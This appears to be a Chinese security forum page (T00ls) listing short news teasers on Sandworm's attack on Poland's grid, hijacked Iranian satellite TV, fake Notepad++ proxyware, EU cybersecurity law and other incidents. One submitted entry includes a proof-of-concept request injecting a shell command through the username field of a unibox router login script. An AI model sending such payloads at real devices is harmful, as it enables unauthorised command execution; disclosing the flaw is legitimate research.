2025年末波兰电网遭受网络攻击被ESET安全研究人员归因于是俄罗斯的APT组织Sandworm
ESET研究现在发现这次攻击是臭名昭著的与俄罗斯结盟的APT组织沙虫(Sandworm)所为。ESET研究人员表示:“根据我们对恶意软件和相关TTP的分析,我们将此次攻击归因于与俄罗斯结盟的沙虫APT,具有中等信心,因为它与我们分析的许多以前的沙虫雨刷活动有很大的重叠。”“我们不知道这次攻击导致了任何成功的破坏,”他们补充道。 ...
反抗伊朗政权的当地伊朗黑客组织入侵了伊朗Badr卫星系统,劫持了伊朗国家电视台播放了流亡王储的示威活动
近日伊朗Badr卫星系统上的几个伊朗国家电视频道遭到黑客攻击,这些频道播放了抗议活动的镜头,以及伊朗流亡王储礼萨·巴列维呼吁人们加入示威活动,并呼吁军队站在抗议者一边。据以色列公共广播公司KAN News报道,被黑客入侵的广播大约在晚上9点30分播出,持续了大约10分钟。被劫持的广播敦促抗议者继续前进,展示了世界各 ...
伪装成 Notepad++ 工具的代理软件恶意软件利用 Windows 资源管理器进程劫持系统
一种针对毫无戒心用户的复杂恶意软件攻击活动已经出现,该活动将恶意代理软件伪装成合法的 Notepad++ 安装程序。此次攻击由威胁行为者 Larva-25012 精心策划,利用用户通过欺骗性广告页面和虚假下载门户网站寻求破解软件的心理。该恶意软件会在未经受害者同意的情况下劫持其互联网带宽,使攻击者能够通过与外部各方共享网络 ...
欧盟准备优化网络安全政策,施行网络安全改革,从而更新《网络安全法》
CSA是欧盟议会和理事会于2019年3月通过的一项法规,旨在加强欧盟范围内的网络安全。该委员会有两个主要目标:建立一个永久性的欧盟范围内的信息与通信技术(ICT)产品、服务和流程网络安全认证框架;并加强欧盟网络安全署(ENISA)的授权。然而,该法规也受到批评,尤其是因其自愿性质——许多公司,尤其是中小企业(SMB)因 ...
Konni APT组织针对韩国目标利用谷歌和Naver广告传播恶意软件
谷歌于2007年宣布了收购互联网广告技术公司DoubleClick的计划,并于2008年3月以约31亿美元完成了收购。此后,DoubleClick的广告点击跟踪和重定向技术被集成到谷歌广告和谷歌营销平台(GMP)中,作为广告流量交付和绩效衡量的核心基础设施。基于此类广告基础设施的重定向URL极有可能被识别为合法流量,从而有利于逃避初始检测 ...
据称苹果第二大制造商立讯精密遭遇勒索软件攻击——机密数据泄露
据报道,勒索软件攻击导致一家大型电子产品制造商的机密内部文件泄露。此次泄露事件损害了该公司在苹果全球供应链中的关键作用,包括 AirPods 制造、iPhone 生产和 Vision Pro 组装。威胁行为者公布了内部文件,泄露了敏感的运营情报,包括生产工作流程、安全程序和供应链协议。立讯精密生产了约 30% 的 iPhone,并且是苹果 ...
投稿文章:www.wifi-soft.com unibox路由器存在 test_userlogin.php 命令执行漏洞
错误代码test_userlogin.php 81行$REQUEST[‘testuser’] =1Username和password调用exec进行命令执行构造testuser=1&username=";id>111.txt;"&password=1闭合命令执行即可[quote]POC:GET /authentication/test_userlogin.php?testuser=1&username=";id>111.txt;"&password=1 HTTP/1.1Host: ***.***.***User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, ...
T00ls.Com版权所有。T00ls所有原创文章未经管理团队许可,禁止一切形式的转载。当前正在使用CDN加速。
Copyright © 2008 - 2026 T00ls All Rights Reserved.